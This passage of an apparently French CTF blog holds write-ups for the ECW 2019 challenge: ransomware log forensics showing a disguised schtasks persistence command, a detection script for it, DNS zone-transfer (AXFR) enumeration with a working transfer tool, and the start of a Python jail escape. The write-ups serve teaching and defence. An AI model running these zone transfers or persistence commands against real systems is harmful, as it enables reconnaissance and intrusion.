class="o">{</span>6b71f96b-c81b-5d8d-0000-0010ed433700<span class="o">}</span><span class="s2">","</span><span class="m">8312</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c81c-5d8d-0000-0010e1493700<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>?<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">511750</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:12.226<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
<span class="s2">"</span><span class="m">2019</span>-09-27T08:28:13.000Z<span class="s2">","</span>DESKTOP-F5ERMDT<span class="s2">",,,,"</span>SYSTEM<span class="s2">","</span>User<span class="s2">",,"</span>Process Create <span class="o">(</span>rule: ProcessCreate<span class="o">)</span><span class="s2">","</span>Microsoft-Windows-Sysmon/Operational<span class="s2">","</span>schtasks.exe /create /f /tn Security<span class="se">\A</span>ntivirusScan /tr C:<span class="se">\U</span>sers<span class="se">\r</span>obert<span class="se">\A</span>ppData<span class="se">\R</span>oaming<span class="se">\W</span>INDefender.exe /sc DAILY<span class="s2">","</span>Microsoft Corporation<span class="s2">",,"</span>E:<span class="se">\"</span>,<span class="s2">"Task Scheduler Configuration Tool"</span>,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"1"</span>,<span class="s2">"2019-09-27 10:28:16"</span>,<span class="s2">"INFO"</span>,<span class="s2">"10.0.17763.1 (WinBuild.160101.0800)"</span>,<span class="s2">"01DNRXBKQMZT9Q2G5XYERS9YBN"</span>,,,<span class="s2">"SHA1=77F125CE5840293890E1359483C7104AADE25FA7,MD5=5BD86A7193D38880F339D4AFB1F9B63A,SHA256=72900A86F3BED7570AA708657A76DD76BB80B68DB543D303DA401AC6983E39CE,IMPHASH=012D1B3C5FD8B10F0F36DB7243A28CB8"</span>,<span class="s2">"C:\Windows\SysWOW64\schtasks.exe"</span>,,<span class="s2">"Medium"</span>,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,<span class="s2">"{6b71f96b-c4e0-5d8d-0000-00204f250900}"</span>,<span class="s2">"0x9254f"</span>,<span class="s2">"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:28:13.974\\r\\nP"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,<span class="s2">"schtasks.exe"</span>,<span class="s2">"""E:\scvhost.exe"""</span>,<span class="s2">"E:\scvhost.exe"</span>,<span class="s2">"{6b71f96b-c81c-5d8d-0000-0010e1493700}"</span>,<span class="s2">"5428"</span>,,<span 
class="s2">"{6b71f96b-c81d-5d8d-0000-00102b973700}"</span>,<span class="s2">"3252"</span>,,<span class="s2">"Microsoft® Windows® Operating System"</span>,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"512731"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,,,<span class="s2">"1"</span>,<span class="s2">"1"</span>,<span class="s2">"5048"</span>,,<span class="s2">"DESKTOP-F5ERMDT\robert"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:28:13.974"</span>,<span class="s2">"5"</span>
<span class="s2">"2019-09-27T08:28:12.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"TASKLIST /FI ""imagename eq payload.py"""</span>,<span class="s2">"Microsoft Corporation"</span>,,<span class="s2">"E:\","</span>Lists the current running tasks<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:13<span class="s2">","</span>INFO<span class="s2">","</span><span class="m">10</span>.0.17763.1 <span class="o">(</span>WinBuild.160101.0800<span class="o">)</span><span class="s2">","</span>01DNRXBGQ97R07WE3QQ0S1BPPG<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>514103BF51B9006D80D0D75018A56E3AF6D03428,MD5<span class="o">=</span>2185AD666AA7188AC9DB4E33DC6A2838,SHA256<span class="o">=</span>B4A874C5CCFA9A698E4A56D7453105CC7617802C385ABE1603760A9BB33D39ED,IMPHASH<span class="o">=</span>D16A743355B243B7509AE74891F10F6B<span class="s2">","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ysWOW64<span class="se">\t</span>asklist.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:12.777<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span 
class="s2">","</span>tasklist.exe<span class="s2">","""</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">""","</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c81c-5d8d-0000-0010e1493700<span class="o">}</span><span class="s2">","</span><span class="m">5428</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c81c-5d8d-0000-0010115e3700<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>Microsoft® Windows® Operating System<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">511935</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:12.777<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
</code></pre></div>
<p>And there we find the smoking gun: <code>schtasks.exe /create /f /tn Security\AntivirusScan /tr C:\Users\robert\AppData\Roaming\WINDefender.exe /sc DAILY</code>.</p>
<p>The ransomware created a scheduled task named Security\AntivirusScan that runs the file WINDefender.exe every day.</p>
<p>Looking in the logs, we see that powershell created this WINDefender.exe file two seconds before the scheduled task was created by scvhost.exe:</p>
<div class="highlight"><pre><span></span><code>$ grep <span class="s1">'WINDefender'</span> logs.csv
<span class="s2">"2019-09-27T08:28:13.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"schtasks.exe /create /f /tn Security\AntivirusScan /tr C:\Users\robert\AppData\Roaming\WINDefender.exe /sc DAILY"</span>,<span class="s2">"Microsoft Corporation"</span>,,<span class="s2">"E:\","</span>Task Scheduler Configuration Tool<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:16<span class="s2">","</span>INFO<span class="s2">","</span><span class="m">10</span>.0.17763.1 <span class="o">(</span>WinBuild.160101.0800<span class="o">)</span><span class="s2">","</span>01DNRXBKQMZT9Q2G5XYERS9YBN<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>77F125CE5840293890E1359483C7104AADE25FA7,MD5<span class="o">=</span>5BD86A7193D38880F339D4AFB1F9B63A,SHA256<span class="o">=</span>72900A86F3BED7570AA708657A76DD76BB80B68DB543D303DA401AC6983E39CE,IMPHASH<span class="o">=</span>012D1B3C5FD8B10F0F36DB7243A28CB8<span class="s2">","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ysWOW64<span class="se">\s</span>chtasks.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:13.974<span class="se">\\</span>r<span class="se">\\</span>nP<span 
class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>schtasks.exe<span class="s2">","""</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">""","</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c81c-5d8d-0000-0010e1493700<span class="o">}</span><span class="s2">","</span><span class="m">5428</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c81d-5d8d-0000-00102b973700<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>Microsoft® Windows® Operating System<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">512731</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:13.974<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
<span class="s2">"</span><span class="m">2019</span>-09-27T08:28:11.000Z<span class="s2">","</span>DESKTOP-F5ERMDT<span class="s2">",,,,"</span>SYSTEM<span class="s2">","</span>User<span class="s2">",,"</span>File created <span class="o">(</span>rule: FileCreate<span class="o">)</span><span class="s2">","</span>Microsoft-Windows-Sysmon/Operational<span class="s2">",,,"</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.694<span class="s2">",,,,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">11</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:12<span class="s2">","</span>INFO<span class="s2">",,"</span>01DNRXBFGKC5BVTGRP6PY02FWF<span class="s2">",,,,"</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">",,,"</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">",,,"</span>File created:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.694<span class="se">\\</span>r<span class="se">\\</span>nPro<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">",,,,,,,"</span><span class="o">{</span>6b71f96b-c810-5d8d-0000-0010eeae3600<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,,"</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">511648</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span 
class="s2">",,,,,,,,,"</span>C:<span class="se">\U</span>sers<span class="se">\r</span>obert<span class="se">\A</span>ppData<span class="se">\R</span>oaming<span class="se">\W</span>INDefender.exe<span class="s2">",,,,,"</span><span class="m">11</span><span class="s2">",,"</span><span class="m">5048</span><span class="s2">",,,"</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.694<span class="s2">","</span><span class="m">2</span><span class="s2">"</span>
<span class="s2">"</span><span class="m">2019</span>-09-27T08:28:13.000Z<span class="s2">","</span>DESKTOP-F5ERMDT<span class="s2">",,,,,,,"</span>Process Creation<span class="s2">","</span>Security<span class="s2">","</span>schtasks.exe /create /f /tn Security<span class="se">\A</span>ntivirusScan /tr C:<span class="se">\U</span>sers<span class="se">\r</span>obert<span class="se">\A</span>ppData<span class="se">\R</span>oaming<span class="se">\W</span>INDefender.exe /sc DAILY<span class="s2">",,,,,,,"</span><span class="m">4688</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:17<span class="s2">","</span>AUDIT_SUCCESS<span class="s2">",,"</span>01DNRXBMNRBYNTWMFPZM0JZESX<span class="s2">",,,,,,,"</span>-9214364837600034816<span class="s2">","</span><span class="m">6</span><span class="s2">",,,"</span>A new process has been created.<span class="se">\\</span>r<span class="se">\\</span>n<span class="se">\\</span>r<span class="se">\\</span>nCreator Subject:<span class="se">\\</span>r<span class="se">\\</span>n Security I<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">",,,,,,,,"</span><span class="m">4</span><span class="s2">",,,"</span><span class="o">{</span><span class="m">54849625</span>-5478-4994-A5BA-3E3B0328C30D<span class="o">}</span><span class="s2">","</span><span class="m">66827</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Security-Auditing<span class="s2">",,,,,"</span>DESKTOP-F5ERMDT<span class="s2">","</span>0x9254f<span class="s2">","</span>robert<span class="s2">","</span>S-1-5-21-4014005275-3135484918-1388781346-1001<span class="s2">",,,,,,"</span><span class="m">13312</span><span class="s2">",,"</span><span class="m">8884</span><span class="s2">",,,,,"</span><span class="m">2</span><span 
class="s2">"</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> -n <span class="s2">"WINDefender.exe"</span> <span class="p">|</span> sha1sum <span class="p">|</span> sed -E <span class="s1">'s/^(.)(.*)(.) -/ECW{\1\2\3}/'</span>
ECW<span class="o">{</span>2d8...6f4<span class="o">}</span>
</code></pre></div>
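<p>The 4688 event above is the persistence itself: <code>schtasks.exe</code> creating a daily task named <code>Security\AntivirusScan</code> that runs <code>WINDefender.exe</code> out of the user's <code>AppData\Roaming</code>. As an added example (mine, not part of the original write-up), here is the detection logic a blue team would run over such process-creation events: it parses the <code>schtasks</code> command line and flags task creations whose binary lives in a user-writable directory or whose name mimics security tooling while pointing outside Program Files/Windows. The directory list, the keyword list and the sample events are my own constructions shaped like the export above.</p>

```python
import re

# Directories a standard user can write to; a scheduled task launching from one
# of them is a classic persistence pattern (assumed list, extend as needed).
USER_WRITABLE = (r"\appdata\roaming", r"\appdata\local", r"\programdata",
                 r"\users\public", r"\windows\temp")
SECURITY_WORDS = re.compile(r"defender|antivirus|security|update", re.I)
SYSTEM_DIRS = re.compile(r"^[a-z]:\\(program files( \(x86\))?|windows)\\")


def parse_schtasks(cmdline: str):
    """Split a schtasks.exe command line into {'/switch': value_or_True}; None if not schtasks."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)
    exe = tokens[0].strip('"').lower() if tokens else ""
    if not (exe == "schtasks" or exe.endswith("schtasks.exe")):
        return None
    opts, i = {}, 1
    while i < len(tokens):
        switch = tokens[i].lower()
        if switch.startswith("/") and i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
            opts[switch] = tokens[i + 1].strip('"')   # switch with a value, e.g. /tr <path>
            i += 2
        else:
            opts[switch] = True                        # bare switch, e.g. /create or /f
            i += 1
    return opts


def assess(cmdline: str):
    """Return the reasons a 'schtasks /create' looks like persistence (empty list = benign)."""
    opts = parse_schtasks(cmdline)
    if not opts or "/create" not in opts:
        return []
    tr = opts.get("/tr") if isinstance(opts.get("/tr"), str) else ""
    tn = opts.get("/tn") if isinstance(opts.get("/tn"), str) else ""
    reasons = []
    if any(d in tr.lower() for d in USER_WRITABLE):
        reasons.append("task binary lives in a user-writable directory")
    if SECURITY_WORDS.search(tn) and not SYSTEM_DIRS.match(tr.lower()):
        reasons.append("task name mimics security tooling but binary is outside Program Files/Windows")
    return reasons


# Constructed sample events in the shape of the export above:
# (timestamp, host, subject user, command line). Only the first one is from the page.
SAMPLE_EVENTS = [
    ("2019-09-27T08:28:13.000Z", "DESKTOP-F5ERMDT", "robert",
     r"schtasks.exe /create /f /tn Security\AntivirusScan /tr C:\Users\robert\AppData\Roaming\WINDefender.exe /sc DAILY"),
    ("2019-09-27T09:02:41.000Z", "DESKTOP-F5ERMDT", "robert",
     r'schtasks.exe /create /tn "Backup\Nightly" /tr "C:\Program Files\Backup\backup.exe" /sc DAILY /st 02:00'),
    ("2019-09-27T09:05:10.000Z", "DESKTOP-F5ERMDT", "robert",
     r"schtasks.exe /query /tn Backup\Nightly"),
    ("2019-09-27T09:07:55.000Z", "DESKTOP-F5ERMDT", "robert",
     r'"C:\Windows\System32\notepad.exe" C:\Users\robert\notes.txt'),
]


def scan(events):
    """Return (host, user, command line, reasons) for every event that trips a rule."""
    hits = []
    for _ts, host, user, cmd in events:
        reasons = assess(cmd)
        if reasons:
            hits.append((host, user, cmd, reasons))
    return hits


if __name__ == "__main__":
    for host, user, cmd, reasons in scan(SAMPLE_EVENTS):
        print(f"[{host}] {user}: {cmd}")
        for r in reasons:
            print(f"    - {r}")
```

In a real pipeline the command line comes from the 4688 <code>CommandLine</code> field (or Sysmon event 1); the rule is deliberately narrow so that software installers creating tasks under Program Files do not fire.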
<p>Thanks to the organizers for the CTF, and to you for reading!</p>
<p>Killbit</p>ECW - Where is the DNS?2019-11-22T00:00:00+01:002019-11-22T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-11-22:/ecw-where-is-the-dns.html<div class="highlight"><pre><span></span><code>Where is the DNS? (25 points)
The DHCP server of the Harbour Master's Office (HMO) LAN (10.0.10.0/24) in which you are connected push a bad DNS configuration to its clients.
If you want to resolve DNS hostnames, you will have to find a working DNS server somewhere into the network infrastructure.
If so, make sure this server has no security issue in its configuration.
</code></pre></div>
<p>On first connecting to the network, the DHCP lease did not hand out any DNS server. Knowing that the server <code>10.0.10.1</code> is a pfSense box, we can guess that its DNS service is enabled as well.
So we add it to our resolver configuration by hand. That gives us access to the flag submission platform.</p>
<p>Going by the statement, the flag seems to live in the DNS itself. Let's see whether zone transfers (AXFR) are enabled on that server:</p>
<div class="highlight"><pre><span></span><code>$ dig harbour.lan @10.0.10.1 -t AXFR
</code></pre></div>
<p>Hmm. Not conclusive. The pfSense box is probably not the only DNS server around. So we query the SOA record of the zone, whose MNAME field names the primary server:</p>
<div class="highlight"><pre><span></span><code>$ dig @10.0.10.1 SOA harbour.lan
<span class="p">;</span> <<>> DiG <span class="m">9</span>.14.7 <<>> SOA harbour.lan
<span class="p">;;</span> global options: +cmd
<span class="o">[</span>...<span class="o">]</span>
<span class="p">;;</span> QUESTION SECTION:
<span class="p">;</span>harbour.lan. IN SOA
<span class="p">;;</span> ANSWER SECTION:
harbour.lan. <span class="m">604800</span> IN SOA dmz-dns.harbour.lan. admin.harbour.lan. <span class="m">3</span> <span class="m">604800</span> <span class="m">86400</span> <span class="m">2419200</span> <span class="m">604800</span>
<span class="p">;;</span> ADDITIONAL SECTION:
dmz-dns.harbour.lan. <span class="m">604800</span> IN A <span class="m">10</span>.0.100.30
<span class="o">[</span>...<span class="o">]</span>
</code></pre></div>
<p>That's it. The pfSense box is not authoritative for the zone (it only resolves it), which is why the zone transfer did not go through: AXFR has to be sent to an authoritative server, here <code>dmz-dns.harbour.lan</code>, whose address <code>10.0.100.30</code> is given in the additional section.</p>
<p>We repeat the request against that DNS server:</p>
<div class="highlight"><pre><span></span><code>$ dig harbour.lan @10.0.100.30 -t AXFR
</code></pre></div>
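<p>The two steps above (ask the SOA for the primary master, then try AXFR against it rather than against the resolver) are what an audit script should do for every zone it checks. Below is an added example, written for this post and not part of the original write-up, that does exactly that with the standard library only: it builds the DNS query, decodes the SOA answer with its additional A record, then runs the transfer over TCP and treats a non-zero RCODE (for example REFUSED) as the server being locked down. The <code>SAMPLE_SOA_RESPONSE</code> bytes are my own encoding of the SOA answer shown above so the parser can be exercised offline; the function names are mine.</p>

```python
import random
import socket
import struct

# RFC 1035 record types and the IN class.
A, NS, SOA, AXFR, IN = 1, 2, 6, 252, 1


def build_query(name, qtype, qid=None):
    """Single-question DNS query for `name`/`qtype` with the RD bit set."""
    qid = random.getrandbits(16) if qid is None else qid
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, IN)


def read_name(msg, off):
    """Decode a (possibly compressed) name at `off`; return (name, offset after it)."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                      # compression pointer
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            jumped, off = True, ptr
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode())
        off += length
    return ".".join(labels) + ".", (end if jumped else off)


def rcode(msg):
    return struct.unpack("!H", msg[2:4])[0] & 0x0F


def parse_records(msg):
    """(owner, type, value) for each RR in the answer, authority and additional sections."""
    _qid, _flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):                                # skip the question section
        _, off = read_name(msg, off)
        off += 4
    records = []
    for _ in range(an + ns + ar):
        owner, off = read_name(msg, off)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype in (SOA, NS):                         # SOA rdata starts with MNAME, the primary
            value = read_name(msg, off)[0]
        elif rtype == A:
            value = ".".join(str(b) for b in msg[off:off + 4])
        else:
            value = msg[off:off + rdlen]
        records.append((owner, rtype, value))
        off += rdlen
    return records


def primary_master(records):
    """From a SOA answer: (MNAME, its A record from the additional section or None)."""
    mname = next((v for _, t, v in records if t == SOA), None)
    if mname is None:
        return None
    return mname, next((v for o, t, v in records if t == A and o == mname), None)


def query_udp(server, name, qtype, timeout=3.0):
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, qtype), (server, 53))
        return s.recv(4096)


def recv_exact(sock, n):
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection mid-transfer")
        buf += chunk
    return bytes(buf)


def axfr(server, zone, timeout=5.0):
    """Zone transfer over TCP. Returns the records, or None if the server answered an error."""
    q = build_query(zone, AXFR)
    records = []
    with socket.create_connection((server, 53), timeout=timeout) as s:
        s.sendall(struct.pack("!H", len(q)) + q)
        while True:
            msg = recv_exact(s, struct.unpack("!H", recv_exact(s, 2))[0])
            if rcode(msg) != 0:                        # e.g. REFUSED (5) on a locked-down server
                return None
            records.extend(parse_records(msg))
            if sum(1 for _, t, _ in records if t == SOA) >= 2:
                return records                         # the second SOA closes the transfer


# Constructed sample: the SOA answer shown in the post, encoded as a DNS message.
SAMPLE_SOA_RESPONSE = (
    struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 1)
    + b"\x07harbour\x03lan\x00" + struct.pack("!HH", SOA, IN)
    + b"\xc0\x0c" + struct.pack("!HHIH", SOA, IN, 604800, 38)
    + b"\x07dmz-dns\xc0\x0c" + b"\x05admin\xc0\x0c"
    + struct.pack("!IIIII", 3, 604800, 86400, 2419200, 604800)
    + b"\xc0\x29" + struct.pack("!HHIH", A, IN, 604800, 4) + bytes([10, 0, 100, 30])
)

if __name__ == "__main__":
    import sys
    resolver, zone = sys.argv[1], sys.argv[2]          # e.g. 10.0.10.1 harbour.lan
    info = primary_master(parse_records(query_udp(resolver, zone, SOA)))
    mname, ip = info if info else (None, None)
    print(f"primary master for {zone}: {mname} ({ip})")
    for target in filter(None, (resolver, ip)):
        try:
            result = axfr(target, zone)
        except OSError:
            result = None
        print(f"AXFR {zone} @{target}: " + ("refused/failed" if result is None else f"{len(result)} records"))
```

On the defensive side the check is the same one turned around: if <code>axfr()</code> returns records from any address other than your own secondaries, the server needs an <code>allow-transfer</code>-style restriction (BIND) or its equivalent.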
<p>And there it is! Another 25 points validated :).</p>ECW - REX2019-11-21T00:00:00+01:002019-11-21T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-11-21:/ecw-rex.html<p>After qualifying in the online CTF (<a href="https://www.challenge-ecw.fr">https://www.challenge-ecw.fr</a>, 61st with 225 points), I was able to take part in the final, held at the Couvent des Jacobins in Rennes (35).</p>
<p><img alt="logo.jpg" src="https://blog.nlegall.fr/images/ecw/logo.jpg"></p>
<p>The qualifiers were organised by Thales and the final by Airbus. I would like to thank them both for this major event, which was very instructive on every level (contacts, intellectually, discovery...).</p>
<p>More and more major events are taking place in Brittany, and that is nice to see.</p>
<p>The qualifiers lasted 15 days (5 to 20 October) and the final 7.5 hours on site.</p>
<p>The qualifiers, played solo, offered 15 challenges spread over 6 categories, which lets you discover several aspects of security. Anyone can take part :).</p>
<p>The final, for its part, consisted of a compromised infrastructure that we had to take back control of. So it was not a "classic" CTF, but it is just as interesting and does not cover the same aspects. All participants were split into teams of 4, for a total of 12 teams. We finished 8th with a score of 355 points (26% of the possible total). My thanks to Al3x, Killbit and <a href="https://www.linkedin.com/in/f-demay/">onosh</a> for accompanying me through these 7.5 hours of challenges. I hope to see you again soon at a future CTF :D.</p>
<p>All of our write-ups are available under the <a href="https://blog.nlegall.fr/tag/ecw.html">ecw</a> tag (qualifiers and final).</p>ECW - TheMatrix2019-10-19T00:00:00+02:002019-10-19T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-10-19:/ecw-thematrix.html<p>The point of a jail is to escape from it and reach the flag using only the functions, methods and other objects we are left with. This jail is written in Python 3, and we have to recover the flag with whatever access it lets us keep.</p>
<div class="highlight"><pre><span></span><code>ssh -p <span class="m">10022</span> tete2soja@challenge-ecw.fr
<span class="o">[</span>...<span class="o">]</span>
ECW Challenge - Interactive challenge gateway
Select a challenge to connect to:
Note: connections are limited to <span class="m">1</span> per user
TheMatrix
,
/<span class="p">|</span> __
/ <span class="p">|</span> ,-~ /
Y :<span class="p">|</span> // /
<span class="p">|</span> jj /<span class="o">(</span> .^
>-<span class="s2">"~"</span>-v<span class="s2">"</span>
<span class="s2"> / Y</span>
<span class="s2"> jo o |</span>
<span class="s2"> ( ~T~ j</span>
<span class="s2"> >._-' _./</span>
<span class="s2"> / "</span>~<span class="s2">" |</span>
<span class="s2"> Y _, |</span>
<span class="s2"> /| ;-"</span>~ _ l
/ l/ ,-<span class="s2">"~ \</span>
<span class="s2">\//\/ .- \</span>
<span class="s2"> Y / Y </span>
<span class="s2"> l I !</span>
<span class="s2"> ]\ _\ /"</span><span class="se">\</span>
<span class="o">(</span><span class="s2">" ~----( ~ Y. )</span>
<span class="s2">~~~~~~~~~~~~~~~~~~~~~~~~~~</span>
<span class="s2">Follow the white rabbit !</span>
</code></pre></div>
<p>Right, we're connected and on the correct challenge. Let the hostilities begin!</p>
<div class="highlight"><pre><span></span><code><span class="c1"># Return a dictionary representing the current global symbol table. This is always the dictionary of the current module (inside a function or method, this is the module where it is defined, not the module from which it is called).</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="nb">globals</span><span class="p">())</span>
<span class="p">{</span><span class="s1">'__name__'</span><span class="p">:</span> <span class="s1">'__main__'</span><span class="p">,</span> <span class="s1">'__doc__'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="s1">'__package__'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="s1">'__loader__'</span><span class="p">:</span> <span class="o"><</span><span class="n">_frozen_importlib_external</span><span class="o">.</span><span class="n">SourceFileLoader</span> <span class="nb">object</span> <span class="n">at</span> <span class="mh">0x7fddf767c048</span><span class="o">></span><span class="p">,</span> <span class="s1">'__spec__'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="s1">'__annotations__'</span><span class="p">:</span> <span class="p">{},</span> <span class="s1">'__builtins__'</span><span class="p">:</span> <span class="o"><</span><span class="n">module</span> <span class="s1">'builtins'</span> <span class="p">(</span><span class="n">built</span><span class="o">-</span><span class="ow">in</span><span class="p">)</span><span class="o">></span><span class="p">,</span> <span class="s1">'__file__'</span><span class="p">:</span> <span class="s1">'/app/jail.py'</span><span class="p">,</span> <span class="s1">'__cached__'</span><span class="p">:</span> <span 